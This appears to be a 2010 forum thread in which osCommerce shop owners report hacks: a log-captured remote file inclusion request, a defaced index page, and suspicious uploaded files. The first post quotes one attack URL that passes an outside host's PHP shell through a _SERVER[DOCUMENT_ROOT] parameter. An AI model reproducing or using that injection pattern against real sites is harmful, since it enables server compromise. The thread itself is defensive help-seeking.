5 replies to this topic

[Gergely]

Some days before...


V3 on Hack attempt was barren of results

http:\\thisismyshop.hu\checkout.php\?_SERVER[DOCUMENT_ROOT]=http:\\www.apc.edu.ec\temp?

The http:\\www.apc.edu.ec\temp? file includes PHP/Shell virus!!!!!! ATTENTION! DONT OPEN THIS LINK!

Panda security reports:
PHP/Shell virus infection, file deleted.


My Error logs:

• PHP Notice: Array to string conversion in osc3/includes/functions/html_output.php on line 488
• PHP Notice: Array to string conversion in osc3/includes/functions/general.php on line 51

I found some info about this in this ebook but osCommerce V3 better than 2003 checkouts.

I used visitor web stats behind.

[DunWeb]

Toth,

I am sure you have read this before, but let me type it again......v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

Chris

[Gergely]

DunWeb, on 13 September 2010, 19:54, said:

Toth,

I am sure you have read this before, but let me type it again......v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

Chris

Chris,


Yes, I know.

v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

But RC without some security options more dangerous.

Edited by Gergely, 13 September 2010, 20:12.

[juanfer2k]

Gergely, on 13 September 2010, 20:02, said:

Chris,


Yes, I know.

v3.0 is NOT READY FOR USE unless you can re-write the code yourself to make it stable or follow along with GITHUB and try all of the suggested changes on that repository.

If you are not exceptionally proficient in PHP, then you should be using V2.2 RC2a.

But RC without some security options more dangerous.

My case was on the RC2, i just found the stores's index page changed to an arab message, and titled "hacked by some Doctor Whatever"

What I did, was to clear the entire estore/db structure and went to the backup.

However, theese days i foud 3 suspect files named m.html, s.html, and another one askim???.php wich had some postcard sending feature, and an emo child criyng on the top.
Here's one of the first files stored in pastebin:

http://pastebin.com/PHAWmMLA

Someone on my hosting service, told us it was just an xploid and the risk was low, but they didn't see this files. i just found out,

Thanks in advance,

Juanfer

[juanfer2k]

We've been haacked, a few months ago for sure.
We restored backups and then i found in my store's root 3 files: s.php x.html and mailer.php (for now thoose are the weird ones)

i pasted the code for the 3 fils here:
http://pastebin.com/wm7eLavM

Am currently downloading and will try to do a VER CLEAN installation of the newest 2,3,1 version, but will require some advice to avoid hacking attempts that often

our store is located under http://pilarholguin.com.co/tienda

Edited by juanfer2k, 20 December 2010, 16:49.

[DunWeb]

Juan,

Your template is not functional. You are losing the OSCID when you click the main product image and the other PHP links do not work either (page not found)

It also appears you are trying to update your site to version 2.3.1 and failed to complete the process.



Chris